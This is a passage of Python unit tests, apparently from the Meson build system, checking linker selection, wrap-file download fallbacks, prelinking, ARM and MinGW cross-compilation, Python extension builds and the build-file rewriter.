            'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
        }
        crossfile = tempfile.NamedTemporaryFile(mode='w')
        crossfile.write(textwrap.dedent('''\
            [binaries]
            c = ['{0}']
            '''.format(os.path.join(testdir, 'host_wrapper.py'))))
        crossfile.flush()
        self.meson_cross_file = crossfile.name
        # TODO should someday be explicit about build platform only here
        self.init(testdir, override_envvars=env)

    @skipIfNoPkgconfig
    def test_static_link(self):
        if is_cygwin():
            raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")

        # Build some libraries and install them
        testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
        libdir = os.path.join(self.installdir, self.libdir)
        oldprefix = self.prefix
        self.prefix = self.installdir
        self.init(testdir)
        self.install(use_destdir=False)

        # Test that installed libraries works
        self.new_builddir()
        self.prefix = oldprefix
        meson_args = ['-Dc_link_args=-L{}'.format(libdir),
                      '--fatal-meson-warnings']
        testdir = os.path.join(self.unit_test_dir, '68 static link')
        env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
        self.init(testdir, extra_args=meson_args, override_envvars=env)
        self.build()
        self.run_tests()

    def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
        # Set the per-language linker environment variable(s) to `name` and
        # assert that the freshly detected `lang` compiler picks the linker
        # whose id is `expected`. `check` is an executable that must be on
        # PATH for the test to be meaningful; otherwise skip.
        if is_sunos():
            raise unittest.SkipTest('Solaris currently cannot override the linker.')
        if not shutil.which(check):
            raise unittest.SkipTest('Could not find {}.'.format(check))
        envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP['{}_ld'.format(lang)]]

        # Also test a deprecated variable if there is one.
        if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP:
            envvars.append(
                mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld'])

        for envvar in envvars:
            with mock.patch.dict(os.environ, {envvar: name}):
                env = get_fake_env()
                comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
                if isinstance(comp, (mesonbuild.compilers.AppleClangCCompiler,
                                     mesonbuild.compilers.AppleClangCPPCompiler,
                                     mesonbuild.compilers.AppleClangObjCCompiler,
                                     mesonbuild.compilers.AppleClangObjCPPCompiler)):
                    raise unittest.SkipTest('AppleClang is currently only supported with ld64')
                if lang != 'rust' and comp.use_linker_args('bfd') == []:
                    raise unittest.SkipTest(
                        'Compiler {} does not support using alternative linkers'.format(comp.id))
                self.assertEqual(comp.linker.id, expected)

    def test_ld_environment_variable_bfd(self):
        self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')

    def test_ld_environment_variable_gold(self):
        self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')

    def test_ld_environment_variable_lld(self):
        self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')

    @skip_if_not_language('rust')
    @skipIfNoExecutable('ld.gold')  # need an additional check here because _check_ld checks for gcc
    def test_ld_environment_variable_rust(self):
        self._check_ld('gcc', 'gcc -fuse-ld=gold', 'rust', 'ld.gold')

    def test_ld_environment_variable_cpp(self):
        self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')

    @skip_if_not_language('objc')
    def test_ld_environment_variable_objc(self):
        self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')

    @skip_if_not_language('objcpp')
    def test_ld_environment_variable_objcpp(self):
        self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')

    @skip_if_not_language('fortran')
    def test_ld_environment_variable_fortran(self):
        self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')

    @skip_if_not_language('d')
    def test_ld_environment_variable_d(self):
        # At least for me, ldc defaults to gold, and gdc defaults to bfd, so
        # let's pick lld, which isn't the default for either (currently)
        self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')

    def compute_sha256(self, filename):
        # Helper: hex SHA-256 digest of a file's contents.
        with open(filename, 'rb') as f:
            return hashlib.sha256(f.read()).hexdigest()

    def test_wrap_with_file_url(self):
        # The wrap's primary URLs point at an unreachable host
        # (server.invalid); download must succeed via the file:// fallback
        # URLs for both the source and the patch archives.
        testdir = os.path.join(self.unit_test_dir, '74 wrap file url')
        source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
        patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
        wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
        source_hash = self.compute_sha256(source_filename)
        patch_hash = self.compute_sha256(patch_filename)
        wrap = textwrap.dedent("""\
            [wrap-file]
            directory = foo

            source_url = http://server.invalid/foo
            source_fallback_url = file://{}
            source_filename = foo.tar.xz
            source_hash = {}

            patch_url = http://server.invalid/foo
            patch_fallback_url = file://{}
            patch_filename = foo-patch.tar.xz
            patch_hash = {}
            """.format(source_filename, source_hash, patch_filename, patch_hash))
        with open(wrap_filename, 'w') as f:
            f.write(wrap)
        self.init(testdir)
        self.build()
        self.run_tests()

        # Clean up the generated wrap file and extracted/cached subproject
        # so the source tree is left pristine for other tests.
        windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
        windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
        os.unlink(wrap_filename)

    def test_no_rpath_for_static(self):
        # A statically linked program must not get a build-dir rpath entry.
        testdir = os.path.join(self.common_test_dir, '5 linkstatic')
        self.init(testdir)
        self.build()
        build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
        self.assertIsNone(build_rpath)

    def test_lookup_system_after_broken_fallback(self):
        # Just to generate libfoo.pc so we can test system dependency lookup.
        testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
        self.init(testdir)
        privatedir = self.privatedir

        # Write test project where the first dependency() returns not-found
        # because 'broken' subproject does not exit, but that should not prevent
        # the 2nd dependency() to lookup on system.
        self.new_builddir()
        with tempfile.TemporaryDirectory() as d:
            with open(os.path.join(d, 'meson.build'), 'w') as f:
                f.write(textwrap.dedent('''\
                    project('test')
                    dependency('notfound', fallback: 'broken', required: false)
                    dependency('libfoo', fallback: 'broken', required: true)
                    '''))
            self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir})

    def test_as_link_whole(self):
        # bar1.pc must list -lfoo while bar2.pc must not (see the
        # '78 as link whole' test project for how the two differ).
        testdir = os.path.join(self.unit_test_dir, '78 as link whole')
        self.init(testdir)
        with open(os.path.join(self.privatedir, 'bar1.pc')) as f:
            content = f.read()
            self.assertIn('-lfoo', content)
        with open(os.path.join(self.privatedir, 'bar2.pc')) as f:
            content = f.read()
            self.assertNotIn('-lfoo', content)

    def test_prelinking(self):
        # Prelinking currently only works on recently new GNU toolchains.
        # Skip everything else. When support for other toolchains is added,
        # remove limitations as necessary.
        if is_osx():
            raise unittest.SkipTest('Prelinking not supported on Darwin.')
        if 'clang' in os.environ.get('CC', 'dummy'):
            raise unittest.SkipTest('Prelinking not supported with Clang.')
        gccver = subprocess.check_output(['cc', '--version'])
        if b'7.5.0' in gccver:
            raise unittest.SkipTest('GCC on Bionic is too old to be supported.')

        testdir = os.path.join(self.unit_test_dir, '87 prelinking')
        self.init(testdir)
        self.build()
        outlib = os.path.join(self.builddir, 'libprelinked.a')
        ar = shutil.which('ar')
        self.assertTrue(os.path.exists(outlib))
        self.assertTrue(ar is not None)
        # List the archive members: a prelinked static library must contain
        # exactly one combined '-prelink.o' object.
        p = subprocess.run([ar, 't', outlib],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.DEVNULL,
                           universal_newlines=True, timeout=1)
        obj_files = p.stdout.strip().split('\n')
        self.assertEqual(len(obj_files), 1)
        self.assertTrue(obj_files[0].endswith('-prelink.o'))


class BaseLinuxCrossTests(BasePlatformTests):
    # Don't pass --libdir when cross-compiling. We have tests that
    # check whether meson auto-detects it correctly.
    libdir = None


def should_run_cross_arm_tests():
    # Cross to ARM only when the cross compiler exists and we are not
    # already running on an ARM machine.
    return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')

@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
    '''
    Tests that cross-compilation to Linux/ARM works
    '''

    def setUp(self):
        super().setUp()
        src_root = os.path.dirname(__file__)
        self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')

    def test_cflags_cross_environment_pollution(self):
        '''
        Test that the CFLAGS environment variable does not pollute the cross
        environment. This can't be an ordinary test case because we need to
        inspect the compiler database.
        '''
        testdir = os.path.join(self.common_test_dir, '3 static')
        self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
        compdb = self.get_compdb()
        self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])

    def test_cross_file_overrides_always_args(self):
        '''
        Test that $lang_args in cross files always override get_always_args().
        Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
        architectures such as some Android versions and Raspbian.
        https://github.com/mesonbuild/meson/issues/3049
        https://github.com/mesonbuild/meson/issues/3089
        '''
        testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
        self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
        self.init(testdir)
        compdb = self.get_compdb()
        # The -U from the cross file must come after the built-in -D.
        self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
        self.build()

    def test_cross_libdir(self):
        # When cross compiling "libdir" should default to "lib"
        # rather than "lib/x86_64-linux-gnu" or something like that.
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        self.init(testdir)
        for i in self.introspect('--buildoptions'):
            if i['name'] == 'libdir':
                self.assertEqual(i['value'], 'lib')
                return
        self.assertTrue(False, 'Option libdir not in introspect data.')

    def test_cross_libdir_subproject(self):
        # Guard against a regression where calling "subproject"
        # would reset the value of libdir to its default value.
        testdir = os.path.join(self.unit_test_dir, '77 subdir libdir')
        self.init(testdir, extra_args=['--libdir=fuf'])
        for i in self.introspect('--buildoptions'):
            if i['name'] == 'libdir':
                self.assertEqual(i['value'], 'fuf')
                return
        self.assertTrue(False, 'Libdir specified on command line gets reset.')

    def test_std_remains(self):
        # C_std defined in project options must be in effect also when cross compiling.
        testdir = os.path.join(self.unit_test_dir, '51 noncross options')
        self.init(testdir)
        compdb = self.get_compdb()
        self.assertRegex(compdb[0]['command'], '-std=c99')
        self.build()

    @skipIfNoPkgconfig
    def test_pkg_config_option(self):
        if not shutil.which('arm-linux-gnueabihf-pkg-config'):
            raise unittest.SkipTest('Cross-pkgconfig not found.')
        testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
        self.init(testdir, extra_args=[
            '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
            '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
        ])

    def test_run_native_test(self):
        '''
        https://github.com/mesonbuild/meson/issues/7997
        check run native test in crossbuild without exe wrapper
        '''
        testdir = os.path.join(self.unit_test_dir, '88 run native test')
        stamp_file = os.path.join(self.builddir, 'native_test_has_run.stamp')
        self.init(testdir)
        self.build()
        # The stamp file is only created by actually running the native test.
        self.assertPathDoesNotExist(stamp_file)
        self.run_tests()
        self.assertPathExists(stamp_file)


def should_run_cross_mingw_tests():
    # Cross to MinGW only when the cross compiler exists and we are not
    # already on Windows/Cygwin.
    return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())

@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
    '''
    Tests that cross-compilation to Windows/MinGW works
    '''

    def setUp(self):
        super().setUp()
        src_root = os.path.dirname(__file__)
        self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')

    def test_exe_wrapper_behaviour(self):
        '''
        Test that an exe wrapper that isn't found doesn't cause compiler sanity
        checks and compiler checks to fail, but causes configure to fail if it
        requires running a cross-built executable (custom_target or run_target)
        and causes the tests to be skipped if they are run.
        '''
        testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
        # Configures, builds, and tests fine by default
        self.init(testdir)
        self.build()
        self.run_tests()
        self.wipe()
        os.mkdir(self.builddir)
        # Change cross file to use a non-existing exe_wrapper and it should fail
        self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
        # Force tracebacks so we can detect them properly
        env = {'MESON_FORCE_BACKTRACE': '1'}
        with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
            # Must run in-process or we'll get a generic CalledProcessError
            self.init(testdir, extra_args='-Drun-target=false',
                      inprocess=True,
                      override_envvars=env)
        with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
            # Must run in-process or we'll get a generic CalledProcessError
            self.init(testdir, extra_args='-Dcustom-target=false',
                      inprocess=True,
                      override_envvars=env)
        self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
                  override_envvars=env)
        self.build()
        with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
            # Must run in-process or we'll get a generic CalledProcessError
            self.run_tests(inprocess=True, override_envvars=env)

    @skipIfNoPkgconfig
    def test_cross_pkg_config_option(self):
        testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
        self.init(testdir, extra_args=[
            '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
            '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
        ])


class PythonTests(BasePlatformTests):
    '''
    Tests that verify compilation of python extension modules
    '''

    def test_versions(self):
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))

        testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')

        # No python version specified, this will use meson's python
        self.init(testdir)
        self.build()
        self.run_tests()
        self.wipe()

        # When specifying a known name, (python2 / python3) the module
        # will also try 'python' as a fallback and use it if the major
        # version matches
        try:
            self.init(testdir, extra_args=['-Dpython=python2'])
            self.build()
            self.run_tests()
        except unittest.SkipTest:
            # python2 is not necessarily installed on the test machine,
            # if it is not, or the python headers can't be found, the test
            # will raise MESON_SKIP_TEST, we could check beforehand what version
            # of python is available, but it's a bit of a chicken and egg situation,
            # as that is the job of the module, so we just ask for forgiveness rather
            # than permission.
            pass

        self.wipe()

        for py in ('pypy', 'pypy3'):
            try:
                self.init(testdir, extra_args=['-Dpython=%s' % py])
            except unittest.SkipTest:
                # Same as above, pypy2 and pypy3 are not expected to be present
                # on the test system, the test project only raises in these cases
                continue

            # We have a pypy, this is expected to work
            self.build()
            self.run_tests()
            self.wipe()

        # The test is configured to error out with MESON_SKIP_TEST
        # in case it could not find python
        with self.assertRaises(unittest.SkipTest):
            self.init(testdir, extra_args=['-Dpython=not-python'])
        self.wipe()

        # While dir is an external command on both Windows and Linux,
        # it certainly isn't python
        with self.assertRaises(unittest.SkipTest):
            self.init(testdir, extra_args=['-Dpython=dir'])
        self.wipe()


class RewriterTests(BasePlatformTests):
    def setUp(self):
        super().setUp()
        self.maxDiff = None

    def prime(self, dirname):
        # Copy the rewriter test project into the build dir so the rewriter
        # can modify it without touching the source tree.
        copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)

    def rewrite_raw(self, directory, args):
        # Run the meson rewriter and return its JSON output (printed on
        # stderr) as a dict; {} when there was no stderr output.
        if isinstance(args, str):
            args = [args]
        command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
        p = subprocess.run(command, stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE, universal_newlines=True, timeout=60)
        print('STDOUT:')
        print(p.stdout)
        print('STDERR:')
        print(p.stderr)
        if p.returncode != 0:
            if 'MESON_SKIP_TEST' in p.stdout:
                raise unittest.SkipTest('Project requested skipping.')
            raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
        if not p.stderr:
            return {}
        return json.loads(p.stderr)

    def rewrite(self, directory, args):
        # Convenience wrapper: always run the rewriter's 'command' subcommand.
        if isinstance(args, str):
            args = [args]
        return self.rewrite_raw(directory, ['command'] + args)

    def test_target_source_list(self):
        self.prime('1 basic')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

    def test_target_add_sources(self):
        self.prime('1 basic')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

        # Check the written file
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(out, expected)

    def test_target_add_sources_abs(self):
        self.prime('1 basic')
        abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
        add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
        inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
        self.rewrite(self.builddir, add)
        out = self.rewrite(self.builddir, inf)
        expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
        self.assertDictEqual(out, expected)

    def test_target_remove_sources(self):
        self.prime('1 basic')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

        # Check the written file
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(out, expected)

    def test_target_subdir(self):
        self.prime('2 subdirs')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
        expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
        self.assertDictEqual(list(out['target'].values())[0], expected)

        # Check the written file
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(list(out['target'].values())[0], expected)

    def test_target_remove(self):
        self.prime('1 basic')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'target': {
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

    # NOTE(review): method name has a typo ("tatrget"); consider renaming to
    # test_target_add (it still runs, since unittest only requires the
    # 'test' prefix for discovery).
    def test_tatrget_add(self):
        self.prime('1 basic')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

    def test_target_remove_subdir(self):
        self.prime('2 subdirs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(out, {})

    def test_target_add_subdir(self):
        self.prime('2 subdirs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
        self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)

    def test_target_source_sorting(self):
        self.prime('5 sorting')
        add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
        inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
        out = self.rewrite(self.builddir, add_json)
        out = self.rewrite(self.builddir, inf_json)
        # Sources must come back naturally sorted: directories first,
        # then numeric-aware ordering of the file names.
        expected = {
            'target': {
                'exe1@exe': {
                    'name': 'exe1',
                    'sources': [
                        'aaa/a/a1.c', 'aaa/b/b1.c', 'aaa/b/b2.c', 'aaa/f1.c', 'aaa/f2.c', 'aaa/f3.c',
                        'bbb/a/b1.c', 'bbb/b/b2.c', 'bbb/c1/b5.c', 'bbb/c2/b7.c', 'bbb/c10/b6.c',
                        'bbb/a4.c', 'bbb/b3.c', 'bbb/b4.c', 'bbb/b5.c',
                        'a1.c', 'a2.c', 'a3.c', 'a10.c', 'a20.c', 'a30.c', 'a100.c', 'a101.c', 'a110.c',
                        'a210.c', 'a666.c', 'b1.c', 'c2.c'
                    ]
                }
            }
        }
        self.assertDictEqual(out, expected)

    def test_target_same_name_skip(self):
        self.prime('4 same name targets')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {'name': 'myExe', 'sources': ['main.cpp']}
        self.assertEqual(len(out['target']), 2)
        for val in out['target'].values():
            self.assertDictEqual(expected, val)

    def test_kwargs_info(self):
        self.prime('3 kwargs')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1'},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_set(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
                'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
                'dependency#dep1': {'required': True, 'method': 'cmake'}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_add(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD', 'Boost']},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_remove(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'license': 'GPL'},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_remove_regex(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'default_options': 'debug=true'},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_delete(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {},
                'target#tgt1': {},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_default_options_set(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_default_options_delete(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)


class NativeFileTests(BasePlatformTests):

    def setUp(self):
        super().setUp()
        self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
        # Counters used to give each generated config file / wrapper script
        # a unique name within the build dir.
        self.current_config = 0
